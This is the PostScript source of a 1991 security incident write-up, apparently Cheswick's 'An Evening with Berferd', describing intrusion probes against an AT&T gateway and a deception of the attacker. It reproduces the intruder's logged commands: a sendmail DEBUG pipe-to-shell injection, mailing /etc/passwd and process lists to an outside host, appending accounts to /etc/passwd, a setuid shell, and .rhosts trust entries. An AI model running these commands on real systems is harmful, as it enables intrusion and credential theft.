1767 y(When)h(a)f(probe)g(appears)h(to)f(have)h(no)f(legitimate)f(purpose,)h
(I)g(send)h(a)g(message)h(like)d(the)i(following:)150 1857
y Fb(inetfans)26 b(postmaster)q(@s)q(ds)q(u.e)q(du)150 1936
y(Yesterday)g(someone)f(from)g(math.sdsu.)q(ed)q(u)g(fetched)h(the)d
(/etc/pas)q(sw)q(d)i(file)150 1976 y(from)f(our)g(FTP)f(director)q(y.)48
b(The)24 b(file)g(is)f(not)h(important)q(,)i(but)d(these)i(probes)150
2015 y(are)f(sometimes)i(performed)g(from)e(stolen)h(accounts.)150
2094 y(Just)f(thought)h(you'd)g(like)f(to)f(know.)150 2173
y(Bill)h(Cheswick)0 2274 y Ff(This)11 b(is)h(a)g(typical)f(letter)n(.)18
b(It)11 b(is)g(sent)h(to)f(`inetfans')g(which)g(consists)g(of)g(the)g
(Computer)g(Emer)o(gency)i(Response)f(T)m(eam)h(\(CER)n(T\),)f(a)0
2323 y(log,)e(and)g(some)h(interested)f(parties,)g(plus)g(someone)h(who)f(is)
g(likely)f(to)g(care)j(at)e(the)g(of)o(fending)f(site.)0 2391
y(Many)h(system)h(administrators)e(take)i(these)g(reports)f(quite)g
(seriously)m(,)g(especially)g(the)h(military)e(sites.)16 b(Generally)m(,)10
b(system)h(admin-)0 2441 y(istrators)g(are)i(quite)e(cooperative)g(in)h
(hunting)e(down)h(these)i(problems.)20 b(Responses)12 b(to)f(these)i(letters)
e(included)g(apologies)h(\(some)0 2491 y(lengthy\),)7 b(bounced)h(messages,)j
(closed)d(accounts,)h(several)g(tighter)e(routers,)h(and)g(silence.)15
b(When)8 b(a)h(site)f(seems)i(willing)5 b(to)j(sponsor)0 2541
y(repeated)j(cracker)g(activity)e(we)i(consider)f(refusing)g(all)f(packets)i
(from)f(them.)p eop
%%Page: 3 3
bop 0 42 a Fg(2.)21 b(Unfriendly)10 b(Acts)83 137 y Ff(W)m(e've)k(been)g
(running)d(this)i(setup)g(since)h(July)f(1990.)24 b(Probe)13
b(rates)h(go)f(up)g(during)f(college)h(vacations.)25 b(Our)13
b(rate)h(may)g(be)0 187 y(higher)9 b(than)h(most,)h(because)h(we)e(are)h
(well-known)e(and)h(considered)h(by)e(some)i(to)f(be)h(\252The)g(Phone)f
(Company)m(.\272)0 255 y(When)d(a)h(caller)g(fetches)g(the)f
Fc(passwd)f Ff(\256le)i(during)e(a)h(long)f(session,)j(it)d(is)h(not)f
(always)i(clear)g(that)f(he)g(has)h(evil)e(intentions.)12 b(Sometimes)0
304 y(they)e(are)h(just)e(checking)i(to)e(see)j(if)d(any)i(transfer)f(will)f
(work.)0 372 y(The)i(following)d(log,)i(from)g(15)g(Jan)g(1991,)g(shows)g
(decidedly)g(unfriendly)e(activity:)150 463 y Fb(19:43:10)26
b(smtpd[2746)q(6])q(:)g(<---)e(220)f(inet.att)q(.co)q(m)j(SMTP)150
502 y(19:43:14)g(smtpd[2746)q(6])q(:)g(------->)f(debug)150
541 y(19:43:14)h(smtpd[2746)q(6])q(:)g(DEBUG)e(attempt)150
581 y(19:43:14)i(smtpd[2746)q(6])q(:)g(<---)e(200)f(OK)150
620 y(19:43:25)j(smtpd[2746)q(6])q(:)g(------->)f(mail)f(from:</d)q(ev)q(/nu)
q(ll)q(>)150 660 y(19:43:25)i(smtpd[2746)q(6])q(:)g(<---)e(503)f(Expectin)q
(g)i(HELO)150 699 y(19:43:34)h(smtpd[2746)q(6])q(:)g(------->)f(helo)150
739 y(19:43:34)h(smtpd[2746)q(6])q(:)g(HELO)e(from)150 778
y(19:43:34)i(smtpd[2746)q(6])q(:)g(<---)e(250)f(inet.att)q(.co)q(m)150
818 y(19:43:42)j(smtpd[2746)q(6])q(:)g(------->)f(mail)f(from:)h(</dev/nul)q
(l>)150 857 y(19:43:42)h(smtpd[2746)q(6])q(:)g(<---)e(250)f(OK)150
896 y(19:43:59)j(smtpd[2746)q(6])q(:)g(------->)f(rcpt)f(to:</dev)q(/\303)q
(H\303H)q(\303H)q(\303H\303)q(H\303)q(H\303)q(H\303H)q(\303H)q(\303H\303)q
(H\303)q(H\303)q(H\303H)q(\303H)q(\303H\303)q(H)150 936 y(19:43:59)i
(smtpd[2746)q(6])q(:)g(<---)e(501)f(Syntax)i(error)g(in)e(recipient)j(name)
150 975 y(19:44:44)g(smtpd[2746)q(6])q(:)g(------->)f(rcpt)f(to:<|sed)i(-e)d
('1,/\303$/')q(d)j(|)c(/bin/sh)k(;)d(exit)h(0">)150 1015 y(19:44:44)i
(smtpd[2746)q(6])q(:)g(shell)e(character)q(s:)i(|sed)e(-e)f('1,/\303$/')q(d)j
(|)c(/bin/sh)k(;)d(exit)h(0")150 1054 y(19:44:45)i(smtpd[2746)q(6])q(:)g
(<---)e(250)f(OK)150 1094 y(19:44:48)j(smtpd[2746)q(6])q(:)g(------->)f(data)
150 1133 y(19:44:48)h(smtpd[2746)q(6])q(:)g(<---)e(354)f(Start)i(mail)f
(input;)h(end)e(with)i(<CRLF>.<CR)q(LF)q(>)150 1172 y(19:45:04)h(smtpd[2746)q
(6])q(:)g(<---)e(250)f(OK)150 1212 y(19:45:04)j(smtpd[2746)q(6])q(:)g
(/dev/null)48 b(sent)24 b(48)f(bytes)i(to)46 b(upas.secur)q(it)q(y)150
1251 y(19:45:08)26 b(smtpd[2746)q(6])q(:)g(------->)f(quit)150
1291 y(19:45:08)h(smtpd[2746)q(6])q(:)g(<---)e(221)f(inet.att)q(.co)q(m)j
(Terminatin)q(g)150 1330 y(19:45:08)g(smtpd[2746)q(6])q(:)g(finished.)0
1431 y Ff(This)11 b(is)g(our)f(log)h(of)f(an)i(SMTP)f(session.)18
b(These)12 b(arcane)h(sessions)e(are)h(usually)e(carried)h(out)f(between)i
(two)e(mailers.)18 b(In)11 b(this)f(case,)0 1481 y(there)h(was)g(a)g(human)f
(at)h(the)f(other)g(end)g(typing)f(\(and)h(mistyping\))f(commands)i(to)f(our)
g(mail)g(demon.)16 b(The)11 b(\256rst)f(thing)f(he)i(tried)e(was)0
1531 y(the)i Fc(debug)f Ff(command.)19 b(He)11 b(must)g(have)h(been)f
(surprised)f(when)h(he)h(got)e(the)h(\252)p Fc(250)25 b(OK)p
Ff(\272)11 b(response.)18 b(The)11 b(key)g(line)g(is)g(the)f
Fc(rcpt)0 1581 y(to:)17 b Ff(command)c(entered)e(at)h(19:44:44.)17
b(The)12 b(text)f(within)f(the)h(angled)h(brackets)g(of)f(this)f(command)j
(is)e(usually)g(the)g(address)h(of)g(a)0 1630 y(mail)f(recipient.)17
b(Here)12 b(it)e(contains)h(a)g(command)h(line.)18 b Fe(Sendmail)9
b Ff(used)j(to)e(execute)i(this)e(command)i(line)f(as)g(root)g(when)g(it)f
(was)i(in)0 1680 y(debug)e(mode.)15 b(The)c(text)f(of)g(the)g(actual)h(mail)f
(message)i(\(not)d(logged\))g(is)h(piped)g(through)150 1771
y Fb(sed)24 b(-e)f('1,/\303$/'d)j(|)d(/bin/sh)i(;)e(exit)h(0")0
1872 y Ff(which)10 b(strips)g(of)o(f)h(the)f(mail)h(headers)h(and)f(executes)
h(the)e(rest)h(of)g(the)f(message)j(as)e(root.)16 b(The)11
b(text)g(of)f(the)h(message)h(was)g(mailed)f(to)0 1921 y(me.)16
b(Here)11 b(were)g(two)f(of)g(these)g(probes)g(as)h(I)g(logged)e(them,)i
(including)d(a)j(time)f(stamp:)150 2012 y Fb(19:45)92 b(mail)24
b(adrian@em)q(bez)q(zl)q(e.s)q(ta)q(nf)q(ord)q(.e)q(du)i(</etc/pas)q(swd)150
2051 y(19:51)92 b(mail)24 b(adrian@em)q(bez)q(zl)q(e.s)q(ta)q(nf)q(ord)q(.e)q
(du)i(</etc/pas)q(swd)0 2152 y Ff(He)13 b(wanted)g(us)g(to)g(mail)g(him)f(a)i
(copy)f(of)f(our)h(password)g(\256le,)h(presumably)e(to)h(run)f(it)g(through)
g(a)h(password)g(cracking)g(program.)0 2202 y(Each)g(of)e(these)h(probes)f
(came)i(from)e(a)h(user)g Fc(adrian)f Ff(on)g Fa(EMBEZZLE)p
Ff(.)p Fa(ST)m(ANFORD)p Ff(.)q Fa(EDU)p Ff(.)22 b(They)12 b(were)g(overtly)e
(hostile,)h(and)g(came)0 2252 y(within)f(half)h(an)h(hour)f(of)g(the)g
(announcement)h(of)f(U.S.)i(air)e(raids)g(on)h(Iraq.)19 b(I)11
b(idly)f(wondered)i(if)f(Saddam)h(had)g(hired)f(a)h(cracker)g(or)0
2302 y(two.)i(I)c(happened)g(to)f(have)h(the)g(spare)g(bogus)f(passwd)h
(\256le)g(in)f(the)g(FTP)i(directory)m(,)e(so)h(I)f(mailed)h(that)f(to)g(him)
h(with)e(a)j(return)e(address)0 2351 y(of)h Fc(root)p Ff(.)15
b(I)10 b(also)g(sent)h(the)f(usual)g(letter)f(to)h(Stanford.)0
2419 y(The)g(next)f(morning)f(I)h(heard)h(from)f(the)g(folks)g(at)g
(Stanford:)k(they)c(knew)h(about)e(it,)h(and)h(were)g(working)e(on)h(the)g
(problem.)14 b(They)c(also)0 2469 y(said)g(that)g(the)g(account)g
Fc(adrian)g Ff(had)h(been)f(stolen.)p eop
%%Page: 4 4
bop 0 42 a Ff(The)11 b(following)d(Sunday)i(morning)f(I)h(received)h(a)g
(letter)e(from)h(France:)150 128 y Fb(To:)24 b(root@resea)q(rc)q(h.a)q(tt)q
(.c)q(om)150 167 y(Subject:)i(intruder)150 206 y(Date:)e(Sun,)h(20)e(Jan)g
(91)h(15:02:53)h(+0100)150 285 y(I)e(have)46 b(just)24 b(closed)h(an)f
(account)h(on)e(my)g(machine)150 325 y(which)h(has)g(been)g(broken)h(by)e(an)
h(intruder)h(coming)g(from)f(embezzle)q(.s)q(tan)q(fo)q(rd.)q(ed)q(u.)i(He)
150 364 y(\(she\))e(has)g(left)g(a)f(file)h(called)h(passwd.)g(The)f
(contents)i(are:)150 443 y(---------)q(--)q(-)150 482 y(>From)e(root@res)q
(ea)q(rch)q(.a)q(tt)q(.co)q(m)i(Tue)d(Jan)h(15)f(18:49:13)j(1991)150
522 y(Received:)g(from)e(research)q(.at)q(t.)q(com)i(by)e(embezzle.S)q(ta)q
(nfo)q(rd)q(.ED)q(U)i(\(5.61/4.7\))q(;)150 561 y(Tue,)e(15)f(Jan)h(91)f
(18:49:12)j(-0800)150 601 y(Message-I)q(d:)g(<91011602)q(49)q(.AA)q(26)q(092)
q(@e)q(mb)q(ezz)q(le)q(.St)q(an)q(fo)q(rd.)q(ED)q(U>)150 640
y(From:)e(root@res)q(ea)q(rch)q(.a)q(tt)q(.co)q(m)150 680 y(Date:)g(Tue,)h
(15)e(Jan)g(91)h(21:48)g(EST)150 719 y(To:)g(adrian@emb)q(ez)q(zle)q(.s)q(ta)
q(nfo)q(rd)q(.ed)q(u)150 759 y(Root:)g(mgajqD9n)q(OA)q(VDw)q(:0)q(:2)q(:00)q
(00)q(-Ad)q(mi)q(n\()q(000)q(0\))q(:/:)150 798 y(Daemon:)h(*:1:1:00)q(00-)q
(Ad)q(mi)q(n\(0)q(00)q(0\):)q(/:)150 837 y(Bin:)f(*:2:2:000)q(0-)q(Adm)q(in)q
(\(0)q(000)q(\):)q(/bi)q(n:)150 877 y(Sys:)g(*:3:3:000)q(0-)q(Adm)q(in)q(\(0)
q(000)q(\):)q(/us)q(r/)q(v9)q(/sr)q(c:)150 916 y(Adm:)g(*:4:4:000)q(0-)q(Adm)
q(in)q(\(0)q(000)q(\):)q(/us)q(r/)q(ad)q(m:)150 956 y(Uucp:)g(*:5:5:00)q(00)q
(-uu)q(cp)q(\(0)q(000)q(\):)q(/us)q(r/)q(li)q(b/u)q(uc)q(p:)150
995 y(Nuucp:)h(*:10:10:0)q(000)q(-u)q(uc)q(p\(0)q(00)q(0\):)q(/u)q(sr)q(/sp)q
(oo)q(l/u)q(uc)q(pp)q(ubl)q(ic)q(:/u)q(sr)q(/l)q(ib/)q(uu)q(cp/)q(uu)q(ci)q
(co)150 1035 y(Ftp:)f(anonymous)q(:7)q(1:1)q(4:)q(fi)q(le)i(transfer:)q(/:n)q
(o)g(soap)150 1074 y(Ches:)e(j2PPWsiV)q(al)q(..Q)q(:2)q(00)q(:1:)q(me)q(:/u)q
(/c)q(he)q(s:/)q(bi)q(n/s)q(h)150 1113 y(Dmr:)g(a98tVGlT7)q(Gi)q(aM:)q(20)q
(2:)q(1:D)q(en)q(nis)q(:/)q(u/)q(dmr)q(:/)q(bin)q(/s)q(h)150
1153 y(Rtm:)g(5bHD/k5k2)q(mT)q(Ts:)q(20)q(3:)q(1:R)q(ob)q(:/u)q(/r)q(tm)q
(:/b)q(in)q(/sh)150 1192 y(Berferd:)i(deJCw4bQcN)q(T3)q(Y:)q(204)q(:1)q(:Fr)q
(ed)q(:/)q(u/b)q(er)q(fer)q(d:)q(/b)q(in/)q(sh)150 1232 y(Td:)e(PXJ.d9CgZ9)q
(Dm)q(A:2)q(06)q(:1)q(:To)q(m:)q(/u/)q(td)q(:/)q(bin)q(/s)q(h)150
1271 y(Status:)h(R)150 1311 y(---------)q(--)q(-)150 1390 y(Please)g(let)f
(me)f(know)h(if)f(you)h(heard)g(of)g(him.)0 1486 y Ff(My)10
b(bogus)g(password)g(\256le)h(had)f(traveled)g(to)g(France!)16
b(A)10 b(con\256guration)f(error)h(caused)i(our)d(mailer)i(to)f(identify)e
(the)i(password)h(text)0 1536 y(as)g(RFC)e(822)h(header)h(lines,)f(and)g
(carefully)f(adjusted)h(the)g(format)g(accordingly)m(.)k(The)d(\256rst)f
(letter)f(was)i(capitalized,)f(and)g(there)g(was)0 1586 y(a)h(space)g(added)g
(after)f(the)g(\256rst)g(colon)g(on)g(each)h(line.)0 1717 y
Fg(3.)21 b(An)10 b(Evening)g(with)g(Berferd)83 1813 y Ff(On)h(Sunday)f
(evening,)h(January)g(20,)g(I)g(was)h(riveted)e(to)g(CNN)h(like)f(most)h
(people.)17 b(A)11 b(CNN)f(bureau)h(chief)g(in)f(Jerusalem)i(was)0
1863 y(casting)e(about)g(for)f(a)i(gas)g(mask.)16 b(I)10 b(was)h(quite)e
(annoyed)h(when)h(my)f(terminal)g(announced)g(a)h(security)f(event:)150
1949 y Fb(22:33)114 b(finger)25 b(attempt)g(on)f(berferd)0
2045 y Ff(A)9 b(couple)f(of)h(minutes)f(later)h(someone)h(used)f(the)f
Fc(debug)h Ff(command)g(to)g(submit)f(commands)h(to)g(be)g(executed)g(as)h
(root\320he)d(wanted)0 2095 y(our)j(mailer)g(to)g(change)h(our)e(password)i
(\256le!)150 2181 y Fb(22:36)114 b(echo)24 b("beferdd)q(::3)q(00)q(:1:)q(ma)q
(yb)q(e)h(Beferd:/)q(:/)q(bin)q(/s)q(h")h(>>/etc/pa)q(ssw)q(d)374
2221 y(cp)d(/bin/sh)j(/tmp/shell)374 2260 y(chmod)f(4755)f(/tmp/shell)0
2356 y Ff(Again,)10 b(the)g(connection)g(came)i(from)e Fa(EMBEZZLE)p
Ff(.)p Fa(ST)m(ANFORD)p Ff(.)q Fa(EDU)p Ff(.)0 2424 y(What)i(should)e(I)h
(do?)19 b(I)11 b(didn')o(t)f(want)h(to)g(actually)g(give)g(him)h(an)f
(account)h(on)f(our)g(gateway)m(.)20 b(Why)11 b(invite)f(trouble?)18
b(I)11 b(would)g(have)0 2474 y(no)f(keystroke)g(logs)f(of)h(his)g(activity)m
(,)g(and)g(would)f(have)i(to)f(clean)g(up)g(the)g(whole)g(mess)i(later)n(.)0
2542 y(I'd)h(like)f(to)h(string)f(him)h(along)g(a)g(little)f(to)h(see)h(what)
f(other)g(things)f(he)h(had)g(in)g(mind.)24 b(Perhaps)14 b(I)f(could)f
(emulate)i(the)f(operating)0 2591 y(system)f(by)f(hand.)20
b(This)11 b(means)i(that)e(I'd)g(have)h(to)g(teach)g(him)f(that)g(the)h
(machine)g(is)g(slow)m(,)g(because)h(I)f(am)g(no)f(match)i(for)e(a)h(MIPS)0
2641 y(M/120.)k(It)10 b(also)h(meant)g(that)f(I)h(would)f(have)h(to)f(create)
j(a)e(somewhat)g(consistent)f(simulated)g(system,)i(based)g(on)e(some)i
(decisions)e(I)0 2691 y(made)h(up)f(as)h(I)f(went)g(along.)15
b(I)10 b(already)h(had)f(one)g(Decision,)h(because)g(he)g(had)f(received)h(a)
g(password)f(\256le:)p eop
%%Page: 5 5
bop 83 42 a Fg(Decision)10 b(1)21 b Fe(Ftp')-5 b(s)9 b(passwor)n(d)h(\256le)h
(was)f(the)g(r)n(eal)g(one.)0 148 y Ff(Here)h(were)g(a)g(couple)f(more:)83
254 y Fg(Decision)g(2)21 b Fe(The)12 b(gateway)f(machine)g(is)g(poorly)g
(administer)n(ed.)19 b(\(After)11 b(all,)h(it)e(had)h(the)h(DEBUG)g(hole,)g
(and)f(the)g(FTP)83 304 y(dir)n(ectory)g(should)e(never)j(contain)d(a)h(r)n
(eal)g(passwor)n(d)g(\256le.\))83 409 y Fg(Decision)g(3)21
b Fe(The)7 b(gateway)g(machine)g(is)g(t)o(erribly)g(slo)o(w)m(.)k(It)c(could)
g(take)g Ff(hours)f Fe(for)g(mai)o(l)h(t)o(o)f(get)h(t)o(hr)n(ough\320)o
(even)g(overnight!)0 515 y Ff(So)k(I)h(wanted)f(him)h(to)e(think)g(he)i(had)g
(changed)g(our)f(password)g(\256le,)h(but)f(didn')o(t)f(want)h(to)g(actually)
g(let)g(him)h(log)e(in.)19 b(I)11 b(could)g(create)0 565 y(an)g(account,)f
(but)g(make)h(it)f(inoperable.)k(How?)83 671 y Fg(Decision)c(4)21
b Fe(The)10 b(shell)g(doesn')-5 b(t)10 b(r)n(eside)i(in)d Fc(/bin)p
Fe(,)i(it)e(r)n(esides)i(somewher)n(e)h(else.)0 778 y Ff(This)d(decision)f
(was)i(pretty)e(silly)m(,)g(but)g(I)h(had)g(nothing)e(to)h(lose.)15
b(I)8 b(whipped)g(up)h(a)g(test)g(account)g Fc(b)g Ff(with)f(a)h(little)e
(shell)i(script.)14 b(It)8 b(would)0 828 y(send)i(me)i(mail)e(when)g(it)g
(was)g(called,)h(and)g(had)f(some)h(sleeps)g(in)e(it)h(to)g(slow)f(it)h
(down.)k(The)d(caller)g(would)e(see)i(this:)150 916 y Fb(RISC/os)25
b(\(inet\))150 995 y(login:)g(b)150 1034 y(RISC/os)g(\(UMIPS\))h(4.0)d(inet)
150 1074 y(Copyright)j(1986,)f(MIPS)f(Computer)h(Systems)150
1113 y(All)f(Rights)h(Reserved)150 1231 y(Shell)f(not)g(found)0
1330 y Ff(Decision)9 b(3)g(explained)g(why)g(it)g(took)f(about)h(ten)g
(minutes)g(for)g(the)g(addition)f(to)g(the)i(password)f(\256le.)15
b(I)9 b(changed)h(the)f Fc(b)h Ff(to)f Fc(beferdd)0 1380 y
Ff(in)h(the)g(real)g(password)h(\256le.)k(While)10 b(I)g(was)h(setting)e
(this)g(up)h(he)h(tried)e(again:)150 1468 y Fb(22:41)114 b(echo)24
b("bferd)h(::301:1::)q(/:)q(/b)q(in/)q(sh)q(")g(>>)f(/etc/passw)q(d)0
1567 y Ff(Here')n(s)10 b(another)f(proposed)g(addition)f(to)h(our)h(password)
f(\256le.)15 b(He)c(must)e(have)h(put)f(the)h(space)h(in)e(after)h(the)f
(login)f(name)j(because)g(the)0 1617 y(previous)f(command)h(hadn')o(t)f(been)
h(\252executed\272)g(yet,)g(and)g(he)f(remembered)i(the)f(RFC)f(822)f(space)j
(in)e(the)g(\256le)h(we)g(sent)f(him.)16 b(Quite)0 1666 y(a)11
b(\257exible)f(fellow)m(,)g(actually)m(.)15 b(He)c(got)e(impatient)g(while)h
(I)g(installed)f(the)h(new)h(account:)150 1755 y Fb(22:45)114
b(talk)24 b(adrian@e)q(mbe)q(zz)q(le.)q(st)q(an)q(d\303H)q(fo)q(rd.)q(ed)q(u)
374 1794 y(talk)g(adrian@e)q(mbe)q(zz)q(le.)q(st)q(an)q(for)q(d.)q(edu)83
1901 y Fg(Decision)10 b(5)21 b Fe(W)l(e)10 b(don')-5 b(t)10
b(have)h(a)f Ff(talk)f Fe(command.)83 2005 y Fg(Decision)h(6)21
b Fe(Err)n(ors)11 b(ar)n(e)g(not)f(r)n(eported)g(to)g(the)g(invader)g(when)g
(the)g(DEBUG)h(hole)e(is)h(used.)16 b(\(I)10 b(assume)g(this)f(is)h(actually)
83 2055 y(true)k(anyway)n(.\))25 b(Also,)15 b(any)f(err)n(oneous)g(commands)g
(will)e(abort)h(the)g(script)h(and)f(pr)n(event)i(the)e(pr)n(ocessing)h(of)g
(further)83 2105 y(commands)c(in)g(the)g(same)g(script.)0 2211
y Ff(The)i Fe(talk)f Ff(request)g(had)g(come)i(from)e(a)g(dif)o(ferent)g
(machine)h(at)f(Stanford.)18 b(I)11 b(noti\256ed)f(them)i(in)e(case)j(they)e
(didn')o(t)f(know)m(.)18 b(I)11 b(checked)0 2261 y(for)f(Scuds)g(on)g(the)g
(TV)-5 b(.)0 2329 y(He)12 b(had)f(chosen)h(to)e(attack)i(the)f
Fc(berferd)g Ff(account.)18 b(This)12 b(name)g(came)h(from)e(the)g(old)f
(Dick)i(V)-5 b(an)11 b(Dyke)h(show)f(when)g(Jerry)g(V)-5 b(an)0
2379 y(Dyke)10 b(called)h(Dick)f(\252Berferd\272)h(\252because)h(he)f(looked)
e(like)h(one.\272)15 b(It)10 b(seemed)i(like)e(a)g(good)g(name)h(for)f(our)g
(cracker)n(.)0 2446 y(There)h(was)g(a)g(\257urry)f(of)f(new)i(probes.)k(I)10
b(guess)h(Berferd)f(didn')o(t)f(have)i(cable)g(TV)-5 b(.)150
2535 y Fb(22:48)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46
b(bferd)h(from)f(Tip-Quad)q(A.)q(Sta)q(nf)q(or)q(d.E)q(DU)150
2574 y(22:48)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46
b(bferd)h(from)f(Tip-Quad)q(A.)q(Sta)q(nf)q(or)q(d.E)q(DU)150
2613 y(22:49)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46
b(bferd)h(from)f(embezzle)q(.S)q(tan)q(fo)q(rd)q(.ED)q(U)150
2653 y(22:51)114 b(\(Notified)26 b(Stanford)g(of)d(the)h(use)g(of)f
(Tip-QuadA)q(.St)q(an)q(fo)q(rd.)q(ED)q(U\))150 2692 y(22:51)114
b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46 b(bferd)h(from)f(embezzle)q
(.S)q(tan)q(fo)q(rd)q(.ED)q(U)p eop
%%Page: 6 6
bop 150 42 a Fb(22:51)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)46
b(bferd)h(from)f(embezzle)q(.S)q(tan)q(fo)q(rd)q(.ED)q(U)150
81 y(22:55)114 b(echo)24 b("bfrd)h(::303:1::/)q(tm)q(p:)q(/bi)q(n/)q(sh")h
(>>)e(/etc/passw)q(d)150 120 y(22:57)114 b(\(Added)25 b(bfrd)f(to)f(the)h
(real)g(password)i(file.\))150 160 y(22:58)114 b(Attempt)25
b(to)f(login)g(to)f(inet)i(with)46 b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)
q(d.)q(EDU)150 199 y(22:58)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)
46 b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)q(d.)q(EDU)150
239 y(23:05)114 b(echo)24 b("36.92.0)q(.20)q(5")i(>/dev/nul)q(l)374
278 y(echo)e("36.92.0)q(.20)q(5)115 b(embezzle)q(.st)q(an)q(fo)q(rd.)q(ed)q
(u">)q(>/)q(et)q(c./)q(\303H)q(\303H\303)q(H)150 318 y(23:06)f(Attempt)25
b(to)f(login)g(to)f(inet)i(with)46 b(guest)h(from)f(rice-che)q(x.)q(ai.)q(mi)
q(t.)q(edu)150 357 y(23:06)114 b(echo)24 b("36.92.0)q(.20)q(5)115
b(embezzle)q(.st)q(an)q(fo)q(rd.)q(ed)q(u")26 b(>>)d(/etc/host)q(s)150
396 y(23:08)114 b(echo)24 b("embezzl)q(e.s)q(ta)q(nfo)q(rd)q(.e)q(du)i
(adrian">>)q(/tm)q(p/)q(.rh)q(os)q(ts)0 492 y Ff(Apparently)11
b(he)h(was)g(trying)e(to)h Fe(rlogin)f Ff(to)h(our)h(gateway)m(.)20
b(This)12 b(requires)f(appropriate)g(entries)g(in)g(some)i(local)e(\256les.)
20 b(At)12 b(the)f(time)0 542 y(we)g(did)e(not)h(detect)g(attempted)g
Fe(rlogin)f Ff(commands.)150 627 y Fb(23:09)114 b(Attempt)25
b(to)f(login)g(to)f(inet)i(with)46 b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)
q(d.)q(EDU)150 666 y(23:10)114 b(Attempt)25 b(to)f(login)g(to)f(inet)i(with)
46 b(bfrd)h(from)f(embezzle.)q(St)q(anf)q(or)q(d.)q(EDU)150
706 y(23:14)114 b(mail)24 b(adrian@e)q(mbe)q(zz)q(le.)q(st)q(an)q(for)q(d.)q
(edu)i(<)d(/etc/inet)q(d.)q(co)q(nf)374 745 y(ps)g(-aux|mai)q(l)j(adrian@emb)
q(ez)q(zle)q(.s)q(tan)q(fo)q(rd)q(.ed)q(u)0 840 y Ff(Following)9
b(the)j(presumed)g(failed)f(attempts)g(to)g Fe(rlogin)p Ff(,)g(Berferd)h
(wanted)f(our)g Fc(inetd.conf)g Ff(\256le)h(to)f(discover)g(which)g(services)
0 890 y(we)g(did)e(provide.)14 b(I)d(didn')o(t)d(want)i(him)g(to)g(see)h(the)
g(real)f(one,)h(and)f(it)g(was)h(too)e(much)i(trouble)e(to)g(make)j(one.)83
993 y Fg(Decision)e(7)21 b Fe(The)9 b(gateway)e(computer)i(is)f(not)f
(deterministic.)14 b(\(W)l(e've)9 b(always)f(suspected)h(that)e(of)h
(computers)g(anyway)n(.\))150 1085 y Fb(23:28)114 b(echo)24
b("36.92.0)q(.20)q(5)115 b(embezzle)q(.st)q(an)q(fo)q(rd.)q(ed)q(u")26
b(>>)d(/etc/host)q(s)374 1124 y(echo)h("embezzl)q(e.s)q(ta)q(nfo)q(rd)q(.e)q
(du)48 b(adrian")26 b(>>)d(/tmp/.rho)q(sts)374 1164 y(ps)g(-aux|mai)q(l)j
(adrian@emb)q(ez)q(zle)q(.s)q(tan)q(fo)q(rd)q(.ed)q(u)374 1203
y(mail)e(adrian@e)q(mbe)q(zz)q(le.)q(st)q(an)q(for)q(d.)q(edu)i(<)d
(/etc/inet)q(d.)q(co)q(nf)0 1305 y Ff(I)13 b(didn')o(t)f(want)i(him)f(to)g
(see)i(a)f Fe(ps)f Ff(output)f(either)n(.)24 b(Fortunately)m(,)14
b(his)f(Berkeley)g Fe(ps)h Ff(command)g(switches)g(wouldn')o(t)e(work)h(on)g
(our)0 1355 y(System)e(V)f(machine.)0 1423 y(At)h(this)f(point)g(I)h(called)g
(CER)n(T)m(.)g(This)g(was)h(an)g(extended)f(attack,)h(and)f(there)g(ought)f
(to)g(be)i(someone)g(at)f(Stanford)f(tracing)h(the)g(call.)0
1473 y(I)g(didn')o(t)f(realize)h(it)g(would)f(take)h(weeks)h(to)f(get)f(a)i
(trace.)19 b(I)11 b(wasn')o(t)g(sure)g(exactly)g(what)g(CER)n(T)g(does)g(in)g
(these)g(circumstances.)19 b(Do)0 1522 y(they)12 b(call)h(The)h(Feds?)23
b(Roust)11 b(a)j(prosecutor?)22 b(Activate)12 b(an)h(international)e(phone)h
(tap)h(network?)22 b(What)13 b(they)f(did)g(was)h(log)f(and)0
1572 y(monitor)c(everything,)h(and)h(try)g(to)f(get)h(me)g(in)g(touch)f(with)
g(a)h(system)h(manager)f(at)g(Stanford.)15 b(They)10 b(seem)h(to)f(have)g(a)g
(very)g(good)f(list)0 1622 y(of)h(contacts.)0 1690 y(By)g(this)f(time)i(I)f
(had)g(numerous)g(windows)g(on)g(my)g(terminal)g(running)e
Fe(tail)h(-f)h Ff(on)g(various)g(log)f(\256les.)16 b(I)10 b(could)g(monitor)f
(Riyadh)g(and)0 1740 y(all)h(those)g(demons)g(at)h(the)f(same)i(time.)j(The)c
(action)e(resumed)i(with)f(FTP:)150 1825 y Fb(Jan)24 b(20)f(23:36:48)j(inet)e
(ftpd[14437)q(]:)i(<---)e(220)g(inet)g(FTP)g(server)778 1864
y(\(Version)h(4.265)g(Fri)f(Feb)f(2)g(13:39:38)j(EST)d(1990\))i(ready.)150
1904 y(Jan)f(20)f(23:36:55)j(inet)e(ftpd[14437)q(]:)i(------->)g(user)e
(bfrd\303M)150 1943 y(Jan)g(20)f(23:36:55)j(inet)e(ftpd[14437)q(]:)i(<---)e
(331)g(Password)i(required)f(for)f(bfrd.)150 1982 y(Jan)g(20)f(23:37:06)j
(inet)e(ftpd[14437)q(]:)i(------->)g(pass\303M)150 2022 y(Jan)e(20)f
(23:37:06)j(inet)e(ftpd[14437)q(]:)i(<---)e(500)g('PASS':)h(command)h(not)d
(understo)q(od.)150 2061 y(Jan)h(20)f(23:37:13)j(inet)e(ftpd[14437)q(]:)i
(------->)g(pass\303M)150 2101 y(Jan)e(20)f(23:37:13)j(inet)e(ftpd[14437)q
(]:)i(<---)e(500)g('PASS':)h(command)h(not)d(understo)q(od.)150
2140 y(Jan)h(20)f(23:37:24)j(inet)e(ftpd[14437)q(]:)i(------->)g(HELP\303M)
150 2180 y(Jan)e(20)f(23:37:24)j(inet)e(ftpd[14437)q(]:)i(<---)e(214-)g(The)g
(following)i(commands)g(are)778 2219 y(recognized)g(\(*)d(=>'s)i(unimplemen)q
(te)q(d\).)150 2258 y(Jan)f(20)f(23:37:24)j(inet)e(ftpd[14437)q(]:)i(<---)e
